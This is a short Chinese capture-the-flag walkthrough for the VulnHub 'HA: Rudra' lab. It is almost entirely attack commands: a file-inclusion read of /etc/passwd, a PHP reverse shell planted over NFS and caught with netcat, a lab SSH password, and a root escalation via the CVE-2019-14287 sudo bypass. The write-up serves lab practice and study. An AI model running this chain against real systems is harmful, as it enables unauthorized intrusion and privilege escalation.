环境
虚拟机平台:VMware Workstation Pro
攻击机:Kali(IP:192.168.253.136)
靶机:Rudra(IP:192.168.253.149)
下载:https://www.vulnhub.com/entry/ha-rudra,386/
Let’s go
nmap -A 192.168.253.149
网页没有找到提示,进行枚举
dirb http://192.168.253.149
尝试发现 nandi.php 文件存在文件包含
curl http://192.168.253.149/nandi.php?file=/etc/passwd
我们可以通过 NFS 上传反弹shell
showmount -e 192.168.253.149
mkdir nfs
mount -t nfs 192.168.253.149:/home/shivay /root/nfs
cp ../Assorted/php-reverse-shell.php shell.php
curl http://192.168.253.149/nandi.php?file=/home/shivay/shell.php
nc -lp 4444
netstat -pantu
python3 -c 'import pty; pty.spawn("/bin/bash")'
mysql -u root
show databases;
use mahadev;
show tables;
select * from hint;
cd media
cat creds
将文件下载到本地,然后使用这里的工具解密 https://github.com/TryCatchHCF/Cloakify
ssh mahakaal@192.168.253.149
password:kalbhairav
sudo -l
password:kalbhairav
需要利用 CVE-2019-14287,参考 https://paper.seebug.org/1057/
sudo -u#-1 watch -x sh -c 'reset; exec sh 1>&0 2>&0'